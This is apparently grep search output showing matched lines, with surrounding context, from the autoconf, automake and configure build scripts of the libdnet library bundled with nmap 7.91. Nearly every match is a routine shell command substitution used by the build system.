nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7323-{
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7324:  func_arith_result=`expr "$[@]"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7325-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7330-{
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7331:  func_len_result=`expr "$[1]" : ".*" 2>/dev/null || echo $max_cmd_len`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7332-}
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7793-m4_define([lt_combine],
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:7794:[m4_if(m4_eval([$# > 3]), [1],
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-7795-       [m4_pushdef([_Lt_sep], [m4_define([_Lt_sep], m4_defn([lt_car]))])]]dnl
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8013-# $ac_aux_dir to `$srcdir/foo'.  In other projects, it is set to
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8014:# `$srcdir', `$srcdir/..', or `$srcdir/../..'.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8015-#
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8037-# iff we strip the leading $srcdir from $ac_aux_dir.  That would be:
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8038:#   am_aux_dir='\$(top_srcdir)/'`expr "$ac_aux_dir" : "$srcdir//*\(.*\)"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8039-# and then we would define $MISSING as
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8053-# expand $ac_aux_dir to an absolute path
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8054:am_aux_dir=`cd $ac_aux_dir && pwd`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8055-])
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8153-  if test "$am_compiler_list" = ""; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8154:     am_compiler_list=`sed -n ['s/^#*\([a-zA-Z0-9]*\))$/\1/p'] < ./depcomp`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8155-  fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8265-  # Strip MF so we end up with the name of the file.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8266:  mf=`echo "$mf" | sed -e 's/:.*$//'`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8267-  # Check whether this is an Automake generated Makefile or not.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8274-  if sed -n 's,^#.*generated by automake.*,X,p' "$mf" | grep X >/dev/null 2>&1; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8275:    dirpart=`AS_DIRNAME("$mf")`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8276-  else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8280-  # from the Makefile without running `make'.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8281:  DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8282-  test -z "$DEPDIR" && continue
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8283:  am__include=`sed -n 's/^am__include = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8284-  test -z "am__include" && continue
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8285:  am__quote=`sed -n 's/^am__quote = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8286-  # When using ansi2knr, U may be empty or an underscore; expand it
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8287:  U=`sed -n 's/^U = //p' < "$mf"`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8288-  # Find all dependency output files, they are included files with
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8296-    test -f "$dirpart/$file" && continue
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8297:    fdir=`AS_DIRNAME(["$file"])`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8298-    AS_MKDIR_P([$dirpart/$fdir])
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8362-AC_REQUIRE([AC_PROG_INSTALL])dnl
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8363:if test "`cd $srcdir && pwd`" != "`pwd`"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8364-  # Use -I$(srcdir) only when $(srcdir) != ., so that make's output
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8451-    * )
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8452:      _am_stamp_count=`expr $_am_stamp_count + 1` ;;
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8453-  esac
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8454-done
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8455:echo "timestamp for $_am_arg" >`AS_DIRNAME(["$_am_arg"])`/stamp-h[]$_am_stamp_count])
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8456-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8552-# case it prints its new name instead of `make'.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8553:if test "`$am_make -s -f confmf 2> /dev/null | grep -v 'ing directory'`" = "done"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8554-   am__include=include
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8560-   echo '.include "confinc"' > confmf
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8561:   if test "`$am_make -s -f confmf 2> /dev/null`" = "done"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8562-      am__include=.include
##############################################
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8691-if (
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8692:   set X `ls -Lt $srcdir/configure conftest.file 2> /dev/null`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8693-   if test "$[*]" = "X"; then
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8694-      # -L didn't work.
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4:8695:      set X `ls -t $srcdir/configure conftest.file`
nmap-7.91+dfsg1/libdnet-stripped/aclocal.m4-8696-   fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/addr.c-263-		so->sdl.sdl_alen = ETH_ADDR_LEN;
nmap-7.91+dfsg1/libdnet-stripped/src/addr.c:264:		memcpy(LLADDR(&so->sdl), &a->addr_eth, ETH_ADDR_LEN);
nmap-7.91+dfsg1/libdnet-stripped/src/addr.c-265-#else
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/addr.c-316-		a->addr_bits = ETH_ADDR_BITS;
nmap-7.91+dfsg1/libdnet-stripped/src/addr.c:317:		memcpy(&a->addr_eth, LLADDR(&so->sdl), ETH_ADDR_LEN);
nmap-7.91+dfsg1/libdnet-stripped/src/addr.c-318-		break;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-51-CONFIG_CLEAN_FILES =
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:52:am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`;
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-53-am__vpath_adj = case $$p in \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:54:    $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-55-    *) f=$$p;; \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-56-  esac;
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:57:am__strip_dir = `echo $$p | sed -e 's|^.*/||'`;
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-58-am__installdirs = "$(DESTDIR)$(libdir)"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-261-	@list='$(lib_LTLIBRARIES)'; for p in $$list; do \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:262:	  dir="`echo $$p | sed -e 's|/[^/]*$$||'`"; \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-263-	  test "$$dir" != "$$p" || dir=.; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-279-.c.obj:
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:280:	$(COMPILE) -c `$(CYGPATH_W) '$<'`
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-281-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-330-GTAGS:
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:331:	here=`$(am__cd) $(top_builddir) && pwd` \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-332-	  && cd $(top_srcdir) \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-338-distdir: $(DISTFILES)
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:339:	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:340:	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-341-	list='$(DISTFILES)'; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-352-	  if test -d $$d/$$file; then \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in:353:	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
nmap-7.91+dfsg1/libdnet-stripped/src/Makefile.in-354-	    if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-43-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/libdnet-stripped/configure:44:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libdnet-stripped/configure-45-  as_echo='print -r --'
nmap-7.91+dfsg1/libdnet-stripped/configure-46-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/libdnet-stripped/configure:47:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libdnet-stripped/configure-48-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-50-else
nmap-7.91+dfsg1/libdnet-stripped/configure:51:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-52-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-60-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/libdnet-stripped/configure:61:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/libdnet-stripped/configure-62-      esac;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-197-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
nmap-7.91+dfsg1/libdnet-stripped/configure:198:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/libdnet-stripped/configure-199-test \$(( 1 + 1 )) = 2 || exit 1"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-324-      case $as_dir in #(
nmap-7.91+dfsg1/libdnet-stripped/configure:325:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/libdnet-stripped/configure-326-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-397-  {
nmap-7.91+dfsg1/libdnet-stripped/configure:398:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/libdnet-stripped/configure-399-  }
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-404-# ----------------------------------------
nmap-7.91+dfsg1/libdnet-stripped/configure:405:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/libdnet-stripped/configure-406-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-467-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/libdnet-stripped/configure:468:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/libdnet-stripped/configure-469-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-563-  # Remove one level of quotation (which was required for Make).
nmap-7.91+dfsg1/libdnet-stripped/configure:564:  ECHO=`echo "$lt_ECHO" | sed 's,\\\\\$\\$0,'$0','`
nmap-7.91+dfsg1/libdnet-stripped/configure-565-  ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-574-  :
nmap-7.91+dfsg1/libdnet-stripped/configure:575:elif test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t' ; then
nmap-7.91+dfsg1/libdnet-stripped/configure-576-  # Yippee, $ECHO works!
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-600-      # expected sizes: less than 2Kb, 1Kb, 512 bytes, 16 bytes, ...
nmap-7.91+dfsg1/libdnet-stripped/configure:601:      if { echo_test_string=`eval $cmd`; } 2>/dev/null &&
nmap-7.91+dfsg1/libdnet-stripped/configure-602-	 { test "X$echo_test_string" = "X$echo_test_string"; } 2>/dev/null
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-608-
nmap-7.91+dfsg1/libdnet-stripped/configure:609:  if test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/configure:610:     echo_testing_string=`{ $ECHO "$echo_test_string"; } 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-611-     test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-623-      if (test -f $dir/echo || test -f $dir/echo$ac_exeext) &&
nmap-7.91+dfsg1/libdnet-stripped/configure:624:         test "X`($dir/echo '\t') 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/configure:625:         echo_testing_string=`($dir/echo "$echo_test_string") 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-626-         test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-635-      if test "X`{ print -r '\t'; } 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/configure:636:         echo_testing_string=`{ print -r "$echo_test_string"; } 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-637-         test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-650-        ECHO='printf %s\n'
nmap-7.91+dfsg1/libdnet-stripped/configure:651:        if test "X`{ $ECHO '\t'; } 2>/dev/null`" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/configure:652:	   echo_testing_string=`{ $ECHO "$echo_test_string"; } 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-653-	   test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-655-	  :
nmap-7.91+dfsg1/libdnet-stripped/configure:656:        elif echo_testing_string=`($ORIGINAL_CONFIG_SHELL "$0" --fallback-echo '\t') 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-657-	     test "X$echo_testing_string" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/configure:658:	     echo_testing_string=`($ORIGINAL_CONFIG_SHELL "$0" --fallback-echo "$echo_test_string") 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-659-	     test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-664-	  ECHO="$CONFIG_SHELL $0 --fallback-echo"
nmap-7.91+dfsg1/libdnet-stripped/configure:665:        elif echo_testing_string=`($CONFIG_SHELL "$0" --fallback-echo '\t') 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-666-	     test "X$echo_testing_string" = 'X\t' &&
nmap-7.91+dfsg1/libdnet-stripped/configure:667:	     echo_testing_string=`($CONFIG_SHELL "$0" --fallback-echo "$echo_test_string") 2>/dev/null` &&
nmap-7.91+dfsg1/libdnet-stripped/configure-668-	     test "X$echo_testing_string" = "X$echo_test_string"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-674-	  for cmd in 'echo test' 'sed 2q "$0"' 'sed 10q "$0"' 'sed 20q "$0"' 'sed 50q "$0"'; do
nmap-7.91+dfsg1/libdnet-stripped/configure:675:	    if { test "X$echo_test_string" = "X`eval $cmd`"; } 2>/dev/null
nmap-7.91+dfsg1/libdnet-stripped/configure-676-	    then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-682-	  if test "$prev" != 'sed 50q "$0"'; then
nmap-7.91+dfsg1/libdnet-stripped/configure:683:	    echo_test_string=`eval $prev`
nmap-7.91+dfsg1/libdnet-stripped/configure-684-	    export echo_test_string
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-977-  case $ac_option in
nmap-7.91+dfsg1/libdnet-stripped/configure:978:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-979-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1021-  -disable-* | --disable-*)
nmap-7.91+dfsg1/libdnet-stripped/configure:1022:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1023-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1026-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libdnet-stripped/configure:1027:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1028-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1047-  -enable-* | --enable-*)
nmap-7.91+dfsg1/libdnet-stripped/configure:1048:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1049-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1052-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libdnet-stripped/configure:1053:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1054-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1251-  -with-* | --with-*)
nmap-7.91+dfsg1/libdnet-stripped/configure:1252:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1253-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1256-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libdnet-stripped/configure:1257:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1258-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1267-  -without-* | --without-*)
nmap-7.91+dfsg1/libdnet-stripped/configure:1268:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1269-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1272-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libdnet-stripped/configure:1273:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1274-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1305-  *=*)
nmap-7.91+dfsg1/libdnet-stripped/configure:1306:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/libdnet-stripped/configure-1307-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1326-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/libdnet-stripped/configure:1327:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1328-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1348-    */ )
nmap-7.91+dfsg1/libdnet-stripped/configure:1349:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1350-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1383-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/libdnet-stripped/configure:1384:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/libdnet-stripped/configure-1385-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1439-case $srcdir in
nmap-7.91+dfsg1/libdnet-stripped/configure:1440:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/libdnet-stripped/configure-1441-esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1482-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/libdnet-stripped/configure:1483:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/libdnet-stripped/configure:1484:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/libdnet-stripped/configure-1485-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-1580-*)
nmap-7.91+dfsg1/libdnet-stripped/configure:1581:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1582-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/libdnet-stripped/configure:1583:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/libdnet-stripped/configure-1584-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2050-  as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack
nmap-7.91+dfsg1/libdnet-stripped/configure:2051:  as_decl_name=`echo $2|sed 's/ *(.*//'`
nmap-7.91+dfsg1/libdnet-stripped/configure:2052:  as_decl_use=`echo $2|sed -e 's/(/((/' -e 's/)/) 0&/' -e 's/,/) 0& (/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-2053-  { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $as_decl_name is declared" >&5
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2164-    *\'*)
nmap-7.91+dfsg1/libdnet-stripped/configure:2165:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-2166-    esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2247-      case $ac_val in
nmap-7.91+dfsg1/libdnet-stripped/configure:2248:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/libdnet-stripped/configure-2249-      esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2262-	case $ac_val in
nmap-7.91+dfsg1/libdnet-stripped/configure:2263:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/libdnet-stripped/configure-2264-	esac
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2382-    set,)
nmap-7.91+dfsg1/libdnet-stripped/configure:2383:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/libdnet-stripped/configure:2384:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/libdnet-stripped/configure-2385-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2393-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/libdnet-stripped/configure:2394:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/libdnet-stripped/configure:2395:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/libdnet-stripped/configure-2396-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2413-    case $ac_new_val in
nmap-7.91+dfsg1/libdnet-stripped/configure:2414:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/libdnet-stripped/configure-2415-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2576-if (
nmap-7.91+dfsg1/libdnet-stripped/configure:2577:   set X `ls -Lt $srcdir/configure conftest.file 2> /dev/null`
nmap-7.91+dfsg1/libdnet-stripped/configure-2578-   if test "$*" = "X"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-2579-      # -L didn't work.
nmap-7.91+dfsg1/libdnet-stripped/configure:2580:      set X `ls -t $srcdir/configure conftest.file`
nmap-7.91+dfsg1/libdnet-stripped/configure-2581-   fi
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2612-ac_script='s/[\\$]/&&/g;s/;s,x,x,$//'
nmap-7.91+dfsg1/libdnet-stripped/configure:2613:program_transform_name=`$as_echo "$program_transform_name" | sed "$ac_script"`
nmap-7.91+dfsg1/libdnet-stripped/configure-2614-
nmap-7.91+dfsg1/libdnet-stripped/configure-2615-# expand $ac_aux_dir to an absolute path
nmap-7.91+dfsg1/libdnet-stripped/configure:2616:am_aux_dir=`cd $ac_aux_dir && pwd`
nmap-7.91+dfsg1/libdnet-stripped/configure-2617-
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2641-	   as_fn_executable_p "$as_dir/$ac_prog$ac_exec_ext" || continue
nmap-7.91+dfsg1/libdnet-stripped/configure:2642:	   case `"$as_dir/$ac_prog$ac_exec_ext" --version 2>&1` in #(
nmap-7.91+dfsg1/libdnet-stripped/configure-2643-	     'mkdir (GNU coreutils) '* | \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2720-set x ${MAKE-make}
nmap-7.91+dfsg1/libdnet-stripped/configure:2721:ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'`
nmap-7.91+dfsg1/libdnet-stripped/configure-2722-if eval \${ac_cv_prog_make_${ac_make}_set+:} false; then :
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2730-# GNU make sometimes prints "make[1]: Entering ...", which would confuse us.
nmap-7.91+dfsg1/libdnet-stripped/configure:2731:case `${MAKE-make} -f conftest.make 2>/dev/null` in
nmap-7.91+dfsg1/libdnet-stripped/configure-2732-  *@@@%%%=?*=@@@%%%*)
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2757-
nmap-7.91+dfsg1/libdnet-stripped/configure:2758:if test "`cd $srcdir && pwd`" != "`pwd`"; then
nmap-7.91+dfsg1/libdnet-stripped/configure-2759-  # Use -I$(srcdir) only when $(srcdir) != ., so that make's output
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2958-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/libdnet-stripped/configure:2959:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/libdnet-stripped/configure-2960-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/libdnet-stripped/configure-2961-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/libdnet-stripped/configure:2962:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/libdnet-stripped/configure-2963-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/libdnet-stripped/configure-2982-IFS=$ac_save_IFS
